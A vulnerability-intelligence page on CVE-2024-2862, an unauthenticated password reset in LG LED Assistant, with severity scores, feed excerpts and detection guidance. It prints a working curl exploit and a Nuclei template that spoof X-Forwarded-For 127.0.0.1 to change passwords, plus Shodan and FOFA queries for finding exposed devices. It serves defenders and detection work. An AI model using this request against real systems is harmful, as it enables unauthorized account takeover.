CVE-2024-2862
published 2024-03-25CVE-2024-2862: This vulnerability allows remote attackers to reset the password of anonymous users without authorization on the affected LG LED Assistant.
PriorityP191critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
51.28%
98.8th percentile
This vulnerability allows remote attackers to reset the password of anonymous users without authorization on the affected LG LED Assistant.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| lg | lg_led_assistant | — | — |
| lg_electronics | lg_led_assistant | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandcurl -k -X PUT -H 'X-Forwarded-For:127.0.0.1' -d 'newPw=Password@123&hostName=hostName&to=to&user=user&from=from' 'https://:8787/api/changePw'↗
sigma↗
id: CVE-2024-2862
info:
name: LG LED Assistant - Unauthenticated Password Reset
author: beginee
severity: high
http:
- raw:
- |
PUT /api/changePw HTTP/1.1
Host: {{Hostname}}
X-Forwarded-For: 127.0.0.1
User-Agent: test
Content-Type: application/x-www-form-urlencoded
newPw={{new_password}}&hostName={{hostname}}&to=to&user={{username}}&from=from
matchers:
- type: dsl
dsl:
- 'contains(body, "{\"resCode\":\"SUCCESS\"}")'
- 'status_code == 200'
condition: and- →Detect PUT requests to /api/changePw with an X-Forwarded-For header value of 127.0.0.1 — this is the attacker's method to spoof localhost and trigger unauthenticated password reset. ↗
- →A successful exploit returns the JSON response body {"resCode":"SUCC"} or {"resCode":"SUCCESS"} — monitor HTTP responses on port 8787 for these strings following PUT /api/changePw requests. ↗
- →Use Shodan query 'http.title:"LG LED Assistant"' or FOFA icon_hash '195291629' to identify exposed LG LED Assistant instances on the internet. ↗
- →The vulnerable logic resides in Common.js — endpoint /api/changePw — monitor for unauthenticated PUT requests to this path on the application server. ↗
- ·At time of advisory publication, no vendor patch or mitigation was available for LG LED Assistant v2.1.65. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.1CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-59gg-h898-v8m7: This vulnerability allows remote attackers to reset the password of anonymous users without authorization on the affected LG LED Assistant
ghsa_unreviewed·2024-03-25
CVE-2024-2862 [CRITICAL] CWE-287 GHSA-59gg-h898-v8m7: This vulnerability allows remote attackers to reset the password of anonymous users without authorization on the affected LG LED Assistant
This vulnerability allows remote attackers to reset the password of anonymous users without authorization on the affected LG LED Assistant.
VulnCheck
LG lg_led_assistant Improper Authentication
vulncheck·2024·CVSS 9.1
CVE-2024-2862 [CRITICAL] LG lg_led_assistant Improper Authentication
LG lg_led_assistant Improper Authentication
This vulnerability allows remote attackers to reset the password of anonymous users without authorization on the affected LG LED Assistant.
Affected: LG lg_led_assistant
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://app.crowdsec.net/cti/cve-explorer/CVE-2024-2862
No detection rules found.
Nuclei
LG LED Assistant - Unauthenticated Password Reset
nuclei·CVSS 9.8
CVE-2024-2862 [CRITICAL] LG LED Assistant - Unauthenticated Password Reset
LG LED Assistant - Unauthenticated Password Reset
The /api/changePw endpoint in LG LED Assistant allows unauthenticated password resets when requests are considered to come from localhost. An attacker can spoof the X-Forwarded-For header with value 127.0.0.1 to trigger the behavior and receive a success response.
Template:
id: CVE-2024-2862
info:
name: LG LED Assistant - Unauthenticated Password Reset
author: beginee
severity: high
description: |
The /api/changePw endpoint in LG LED Assistant allows unauthenticated password resets when requests are considered to come from localhost. An attacker can spoof the X-Forwarded-For header with value 127.0.0.1 to trigger the behavior and receive a success response.
impact: |
Attackers can reset passwords of anonymous users, potentially leading
2024-03-25
Published
Exploited in the wild